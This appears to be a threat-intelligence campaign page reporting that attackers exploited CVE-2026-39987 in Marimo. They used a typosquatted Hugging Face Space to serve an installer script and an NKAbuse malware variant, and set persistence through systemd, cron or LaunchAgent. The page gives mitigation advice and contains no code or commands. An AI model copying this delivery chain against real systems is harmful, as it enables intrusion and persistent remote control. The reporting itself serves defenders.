Campaign
Marimo exploitation delivered through a typosquatted Hugging Face Space
Updated 16.04.2026 19:58
Case score 58
Score breakdown
- Total
- 58
- Lead score
- 58
- Support bonus
- +0 / 20
- Scoring support
- 0
- Context members
- 0
Top contributors
- Campaign Lead campaign entry provides the full case basis; no support bonus was added. base
Case score 58
Members 1
Latest activity 16.04.2026 19:58
Members 1
First seen 16.04.2026 19:58
Last seen 16.04.2026 19:58
Updated 16.04.2026 19:58
Overview
Attackers used **Hugging Face Spaces** as delivery infrastructure after exploiting **CVE-2026-39987** in **Marimo**, placing a typosquatted Space named **vsccode-modetx** online with **install-linux.sh** and a **kagent** binary. The payload chain fetched the script with curl, installed a previously undocumented **NKAbuse** variant, and set up persistence with **systemd**, **cron**, or **macOS LaunchAgent**.
Available evidence points to active exploitation and malware delivery, but not to the operator's identity or the full reach of the activity.
Attackers are using **Hugging Face Spaces** to distribute a typosquatted **vsccode-modetx** Space that hosts **install-linux.sh** and a **kagent** binary for malicious delivery. The chain followed exploitation of **CVE-2026-39987** in **Marimo** reactive Python notebook, then used curl to fetch the script and install a previously undocumented **NKAbuse** variant. The payload runs shell commands and returns output to the operator, while persistence can be established with **systemd**, **cron**, or **macOS LaunchAgent**.
The abuse turns a trusted cloud-hosted development service into post-exploitation infrastructure and reduces the chance that victims will question the download source. Available evidence ties the activity to active exploitation of **CVE-2026-39987** and a delivery path that uses a malicious Space rather than a direct vendor-hosted payload. Recommended response is to upgrade **Marimo** to **0.23.0** or later or block external access to **/terminal/ws**; available evidence does not identify the operator or quantify reach.